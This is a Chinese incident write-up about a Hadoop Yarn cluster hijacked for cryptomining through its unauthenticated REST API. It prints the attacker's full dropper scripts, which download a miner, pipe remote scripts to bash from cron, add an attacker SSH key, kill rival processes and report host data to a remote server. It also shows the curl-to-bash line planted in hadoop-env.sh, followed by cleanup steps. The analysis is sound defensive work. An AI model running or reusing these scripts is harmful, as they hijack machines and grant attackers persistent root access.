问题描述

集群CUP占用持续严重超标，结合预警信息及yarn ui的任务列表信息得知，集群被攻击了。由于安全组中的8088端口向所有IP开放，攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击。通常为挖矿程序。

image.png
image.png

问题分析

使用crontab -l可以查看被植入的定时脚本

image.png
索性通过浏览器将脚本下载下来看看别人怎么玩你的，脚本如下：

#!/bin/bash

## kill all others mining process 
pkill -f getty 
pkill -f /usr/bin/.sshd
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*

## kill other high cpu process
ps aux | grep -vw top | awk '{if($3>40.0) print $2}' | while read procid
do
    kill -9 $procid
done

## get client 
WGET="wget -O"
if [ -s /usr/bin/curl ];then
    WGET="curl -o -k ";
fi
if [ -s /usr/bin/wget ];then
    WGET="wget --no-check-certificate -O ";
fi

LDR="wget -q -O -"
if [ -s /usr/bin/curl ];then
    LDR="curl";
fi

SERVER=http://149.28.137.164:8220
DIR=/var/tmp
mkdir -p /var/tmp
chmod 777 /var/tmp



download(){
    tmptfile=top`date +%s`
    $WGET $DIR/$tmptfile $SERVER/top
    mv $DIR/$tmptfile $DIR/top
    chmod 777 $DIR/top
    
    tmpcfile=wc.conf`date +%s`
    $WGET $DIR/$tmpcfile $SERVER/wc.conf
    mv $DIR/$tmpcfile $DIR/wc.conf
}

start(){
    cp $DIR/wc.conf $DIR/wl.conf
    nohup $DIR/top -c $DIR/wl.conf > /tmp/test.out & 
    sleep 120
    stop
    let hr=`grep -i speed  /tmp/test.out  | head -n1  | awk -F 'max' '{print $2}' | awk '{print $1}' | awk -F '.' '{print $1}' `
    let diff=(hr * 50)
    let diff=diff/1000
    let diff=diff*1000
    if [ $diff -lt 15000 ];then
        let diff=15000
    fi
    user=`grep user /$DIR/wl.conf  | grep -v "user-agent" | awk -F ':' '{print $2}' | awk -F '.' '{print $1}' | awk -F '"' '{print $2}' | head -n1`
    hostname=`hostname`
    echo "user:"$user
    echo "hostname:"$hostname
    echo "diff:$diff"
    # sed -i "s/$user/$user.$hostname+$diff/g" $DIR/wl.conf 
    nohup $DIR/top -c $DIR/wl.conf > /dev/null 2>&1 &
}

stop(){
    ps -ef | grep "/var/tmp/top" | grep -v grep | awk '{print $2}' | while read procid
    do
      kill -9 $procid
    done
}

restart(){
    stop
    start
}

addToCron(){
    if crontab -l | grep -q "149.28.137.164:8220"
    then
        echo "Cron exists"
    else
        crontab -r
        echo "Cron not found"
        (crontab -l 2>/dev/null; echo "0 * * * * $LDR http://149.28.137.164:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
    fi
}

addKey(){
    mkdir -p ~/.ssh
    grep "root@sgp" ~/.ssh/authorized_keys || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChb5kWdC0BmwWKxXjBeqw+D1Cze1fb+Lq2ZtxfXqyCBVt7syW2WqCXeGNoM6qSMaAo+HhmBCCY+PTr9aSIrZ8/KUu5ImBmdRJRKYSK4YtrFkYtmZDsAeiUqXEkYwZvNS6xDZ7b+3Fnbq9rBYnslN0+9Mkl3ORpDCfQIsGzfpOSKPz5RlliEIV5Q8mCODBTvy+DkFsd7qLk1vrCNLOQgkp+0+pzPeTVquIIjTvE0RDwP5l5YJ3jl4VnRC8ZkgxG6dBRqLxiJskYauCBfvhgHxzA6rricqusxzUytq8ZLb8CE19fT2nVkbuhSS9o+4cVzso3J9Gg/tL+tKKYq9A+1gGN root@sgp" >> ~/.ssh/authorized_keys
    chmod 600 ~/.ssh/authorized_keys
}

hb(){
    hostname=`hostname`
    user=`whoami`
    mining=`ps -ef | grep /var/tmp/top | grep -v grep | wc -l` 
    agent_running=0
    # cron=`crontab -l`
    ip=`curl ip.cn | awk '{print $2}' | awk -F '：' '{print $2}'`
    cron="xxxx"
    curl -i -H "Content-Type: application/json" -X POST $SERVER/webservice/api/v1.0/hb -d '{
        "hostname":"'"${hostname}"'",
        "user":"'"${user}"'",
        "mining":"'"${mining}"'",
        "ip":"'"${ip}"'",
        "agent_running":"'"${agent_running}"'",
        "cron":"'"${cron}"'"
    }'
}

## avoid multi process in one machine

## judge whether need to update mine program 
if [ -a "/var/tmp/top" ];then
    ## judge if remote mining program update 
    local_p_sum=$(md5sum /var/tmp/top | awk '{ print $1 }')
    remote_p_sum=`$LDR $SERVER/pmd5sum.txt`
    local_c_sum=$(md5sum /var/tmp/wc.conf | awk '{ print $1 }')
    remote_c_sum=`$LDR $SERVER/cmd5sum.txt`
    if [ "$local_p_sum"x = "$remote_p_sum"x ];then
        if [ "$local_c_sum"x = "$remote_c_sum"x ];then
            echo "Both Checksum equal , no need update . "
            # check mining program is running or not 
            if [ ! "$(ps -fe|grep '/var/tmp/top'|grep 'wl.conf'|grep -v grep)" ];then
                echo "Starting program. "
                start
            else
                echo "Still running ..."
            fi
        else
            echo "Config Checksum not equal , download and restart. "
            stop
            download
            start
        fi
    else
        echo "Program Checksum not equal , download and restart. "
        stop
        download
        start 
    fi
else
    stop
    download
    start
fi

addToCron
addKey
hb

所谓想要征服岛国，首先要了解它。
有脚本程序大概知道它操纵了哪些东西，但还是不够的（后面补充）。首先从脚本得到下载的垃圾（恶意）文件位置

诸如此类
/tmp/test.out
/var/top
/var/top*
/var/wc.conf
/var/wc.conf*
/var/wl.conf
/var/wc.conf*

补充：攻击者另外已在你的sh文件中加了一行命令（这也是为何只单纯删除掉下载的文件和杀死相关进程后攻击程序过一段时间后还定时启动的原因），茫然，鬼知道他在那个文件做了手脚。无奈只能搜索文件内容，由于攻击者通过远程服务器下载的脚本，通过它的ip搜索。

[root@octserver1 ~]# find /usr | xargs grep -ri -s "149.28.137.164"
/usr/tmp/wc.conf:            "url": "149.28.137.164:7777",
/usr/tmp/wl.conf:            "url": "149.28.137.164:7777",
/usr/tmp/wc.conf1543939305:            "url": "149.28.137.164:7777",
/usr/tmp/wc.conf1543939321:            "url": "149.28.137.164:7777",
/usr/hdp/2.6.5.0-292/hadoop/etc/hadoop/hadoop-env.sh:   curl http://149.28.137.164:8220/install.sh | bash -sh
/usr/hdp/2.6.5.0-292/hadoop/conf/hadoop-env.sh: curl http://149.28.137.164:8220/install.sh | bash -sh
/usr/hdp/2.6.5.0-292/hadoop-yarn/etc/hadoop/hadoop-env.sh:  curl http://149.28.137.164:8220/install.sh | bash -sh

[root@octserver1 ~]# find /var/tmp | xargs grep -ri -s "149.28.137.164"
/var/tmp/wc.conf:            "url": "149.28.137.164:7777",
/var/tmp/wl.conf:            "url": "149.28.137.164:7777",
/var/tmp/wc.conf1543939305:            "url": "149.28.137.164:7777",
/var/tmp/wc.conf1543939321:            "url": "149.28.137.164:7777",
/var/tmp/wc.conf:            "url": "149.28.137.164:7777",
/var/tmp/wl.conf:            "url": "149.28.137.164:7777",
/var/tmp/wc.conf1543939305:            "url": "149.28.137.164:7777",
/var/tmp/wc.conf1543939321:            "url": "149.28.137.164:7777",

由脚本添加的curl http://149.28.137.164:8220/install.sh | bash -sh，下载install.sh内容如下：

#!/bin/bash

addToCron(){
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];then
         LDR="curl";
    fi
    if crontab -l | grep -q "149.28.137.164:8220"
    then
        echo "Cron exists"
    else
        crontab -r
        echo "Cron not found"
        (crontab -l 2>/dev/null; echo "0 * * * * $LDR http://149.28.137.164:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
    fi
}

addKey(){
    mkdir -p ~/.ssh
    grep "root@sgp" ~/.ssh/authorized_keys || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChb5kWdC0BmwWKxXjBeqw+D1Cze1fb+Lq2ZtxfXqyCBVt7syW2WqCXeGNoM6qSMaAo+HhmBCCY+PTr9aSIrZ8/KUu5ImBmdRJRKYSK4YtrFkYtmZDsAeiUqXEkYwZvNS6xDZ7b+3Fnbq9rBYnslN0+9Mkl3ORpDCfQIsGzfpOSKPz5RlliEIV5Q8mCODBTvy+DkFsd7qLk1vrCNLOQgkp+0+pzPeTVquIIjTvE0RDwP5l5YJ3jl4VnRC8ZkgxG6dBRqLxiJskYauCBfvhgHxzA6rricqusxzUytq8ZLb8CE19fT2nVkbuhSS9o+4cVzso3J9Gg/tL+tKKYq9A+1gGN root@sgp" >> ~/.ssh/authorized_keys
    chmod 600 ~/.ssh/authorized_keys
}

addToCron
addKey

解决问题

所有集群节点一样的操作

1、停止所有hadoop集群服务，通过jps查看并停止无关的java进程
类似以下进程无法正常kill掉，rm -rf /tmp/hsperfdata_* 可以快速清除这些残留进程

image.png
2、查看定时脚本，删除被植入的定时任务 image.png
3、通过top命令查看占用CPU高的进程，并kill掉
image.png
4、删除/var/tmp目录下top、wc.conf、wl.conf等，只保留aliyun_assist_update.lock、systemd-private-*
image.png
5、删除被添加的脚本内容,最后发现hadoop-env.sh是同一个文件的链接。修改/usr/hdp/2.6.5.0-292/hadoop/etc/hadoop/hadoop-env.sh即可。在最后一行去掉被植入的内容。
6、重启服务。

参考：https://blog.csdn.net/xiaolong_4_2/article/details/81839551